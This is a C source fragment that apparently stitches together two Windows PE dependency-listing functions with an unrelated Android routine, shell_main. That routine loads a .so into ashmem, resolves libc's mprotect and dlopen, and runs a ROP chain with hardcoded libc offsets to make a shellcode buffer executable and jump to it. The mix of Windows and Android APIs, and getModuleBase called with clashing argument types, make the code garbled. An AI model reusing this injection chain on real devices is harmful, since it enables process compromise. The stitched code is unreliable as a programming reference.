int main( int argc, char * argv[] ) { if ( !ProcessCommandLine( argc, argv ) ) { printf( "%s %d bit build\n%s",argv[0],8*sizeof(void*),g_szHelpSyntax ); return 1; } MODULE_DEPENDENCY_LIST depends( g_pszPrimaryFile ); if ( !depends.IsValid() ) { printf( "Error: %s %s\n", g_pszPrimaryFile, depends.GetErrorString() ); return 1; } PMODULE_FILE_INFO pModInfo = 0; while ( pModInfo = depends.GetNextModule( pModInfo ) ) { DisplayFileInformation( pModInfo,g_fQuiet ); PMODULE_FILE_INFO pNotFound = 0; while ( pNotFound = pModInfo->GetNextNotFoundModule(pNotFound) ) { LPCTSTR base = getModuleBase(pNotFound,g_fQuiet) ; if ( base ) printf( " Not found: %s\n", base ); } } return 0; }
void shell_main(){ dlopen_t dlopen_f = (dlopen_t)getProcAddr(NULL,"dlopen"); dlsym_t dlsym_f = (dlsym_t)getProcAddr(NULL,"dlsym"); const char *so_name = "/data/local/tmp/testso.so"; char *code = (char*)get_so_buffer(so_name); int ashmem_len = *(int*)code; int fd_memory = ashmem_create_region("shmem", ashmem_len); ashmem_pin_region(fd_memory, 0, 0); uint8_t *shm = (uint8_t*)mmap(NULL, ashmem_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd_memory, 0); printf("first map address is %p\n",shm); memcpy(shm,code,ashmem_len); free(code); //ashmem_unpin_region(fd_memory, 0, 0); int pos[32]={12,2,12,fd_memory}; //shellcode(dlopen_f,pos); uint32_t libcbase = (uint32_t)getModuleBase("libc.so"); uint32_t mprotect_address = (uint32_t)getProcAddr("libc.so","mprotect"); uint32_t len = 0; void *buffer = get_shellcode(&len); uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,(uint32_t)pos,2,(uint32_t)buffer+1}; //uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,1,2,(uint32_t)shellcode}; asmm_test((uint32_t)ropData); free(buffer); exit(-1); }
void DisplayFileInformation( PMODULE_FILE_INFO pModInfo, BOOL bQuiet ) { LPCTSTR base = getModuleBase(pModInfo,bQuiet); if ( !base ) return ; printf( "%-14s", base) ; // ->GetBaseName() ); PSTR pszFullName = pModInfo->GetFullName(); if ( g_fShowDateTime ) { HFILE hFile = _lopen( pszFullName, OF_READ ); if ( HFILE_ERROR != hFile ) { FILETIME ft; if ( GetFileTime( (HANDLE)hFile, 0, 0, &ft ) ) { char szFileDate[32] = { 0 }; char szFileTime[32] = { 0 }; GetFileDateAsString(&ft, szFileDate, sizeof(szFileDate) ); GetFileTimeAsString(&ft, szFileTime, sizeof(szFileTime), TRUE); printf( "%s %s ", szFileDate, szFileTime ); } _lclose( hFile ); } } if ( g_fShowLinkDateTime ) { FILETIME ft; char szFileDate[32] = { 0 }; char szFileTime[32] = { 0 }; PE_EXE exe( pszFullName ); TimeDateStampToFileTime( exe.GetTimeDateStamp(), &ft ); GetFileDateAsString(&ft, szFileDate, sizeof(szFileDate) ); GetFileTimeAsString(&ft, szFileTime, sizeof(szFileTime), TRUE); printf( "%s %s ", szFileDate, szFileTime ); } if ( g_fShowFullPath ) printf( "(%s)", pszFullName ); printf( "\n" ); if ( g_fShowVersion ) ShowVersionInfo( pszFullName ); }